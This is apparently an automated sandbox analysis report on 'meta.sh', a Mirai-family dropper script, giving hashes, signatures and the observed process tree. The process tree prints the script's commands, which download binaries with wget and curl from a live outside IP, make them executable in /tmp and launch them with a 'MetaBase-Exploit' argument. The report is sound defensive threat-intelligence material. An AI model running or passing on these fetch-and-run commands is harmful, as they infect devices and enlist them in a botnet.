Analysis
-
max time kernel
5s -
max time network
4s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
17-02-2025 10:22
Static task
static1
Behavioral task
behavioral1
Sample
meta.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
meta.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
meta.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
meta.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
meta.sh
-
Size
483B
-
MD5
79b512b0b1a43d26890e67dfb400c8c8
-
SHA1
e8db4e2ce94cdcd5f97a02be52968a336b60d784
-
SHA256
c41d5810be4537b41400f5aefb61ace955fe7f1bfc26a2bb0cd6144f38aa3679
-
SHA512
fade5a3df3df6074e13c0a15f858e005b5ddb353729f050b74179def4dd653cee66fe53f22a484d70064ce38755d4e555fcbde9fa8a27ea70f5e1be1e5257904
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 752 chmod 745 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/kraapje 746 meta.sh /tmp/kraapje 753 meta.sh -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems cp File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/busybox cp File opened for modification /tmp/kre4per.x86 wget File opened for modification /tmp/kre4per.x86 curl File opened for modification /tmp/kraapje meta.sh File opened for modification /tmp/kre4per.x86_64 wget File opened for modification /tmp/kre4per.x86_64 curl
Processes
-
/tmp/meta.sh/tmp/meta.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:715 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/usr/bin/wgetwget http://194.85.251.68/bins/kre4per.x862⤵
- Writes file to tmp directory
PID:722
-
-
/usr/bin/curlcurl -O http://194.85.251.68/bins/kre4per.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/catcat kre4per.x862⤵PID:744
-
-
/bin/chmodchmod +x busybox kraapje kre4per.x86 meta.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-AFao4C2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/kraapje./kraapje MetaBase-Exploit2⤵PID:746
-
-
/usr/bin/wgetwget http://194.85.251.68/bins/kre4per.x86_642⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://194.85.251.68/bins/kre4per.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/catcat kre4per.x86_642⤵PID:751
-
-
/bin/chmodchmod +x busybox kraapje kre4per.x86 kre4per.x86_64 meta.sh systemd-private-62296eb1a0ad45a38bb7146d93baeaea-systemd-timedated.service-AFao4C2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/kraapje./kraapje MetaBase-Exploit2⤵PID:753
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
857KB
MD5a39fe8036e559ce804e26518061e59ff
SHA18df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA2563180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d
-
Filesize
61KB
MD5d2b8f3324a01bcc7b32944d8d8b84f81
SHA1ad898c85a87d9e44d6a88d900b23d350b545e8af
SHA2566bc122342cb7620b9e130b71869bcedd664c243fb8a63bb2f29a9c71cb48fce4
SHA512b8fc9a6c4a713cda10db85e1283f840de8e2a04546a20993c214a9768b8aa98172e810c148f4bf8ed90286fe9cf7b091eabf512ab0bf3681bef759ce9fa894ad
-
Filesize
53KB
MD57ffbdf8a1d617b2c93d5fc520ccb31cc
SHA15dbe3ceeb1e58a61671b74d040b809d343d24b53
SHA2567c3b7d80a9f95b61e3a56a62493c5f3336eabd766a17d2d07e28d01ec750f7eb
SHA5123de46ad924e9ceab846f2a09933a1cb654e5e70c8a4bf84d395c8492470b8bcc0afc838b3f4ceb8086c81e4beba5c2884bd59a202d6c682ae58c6d2a28766727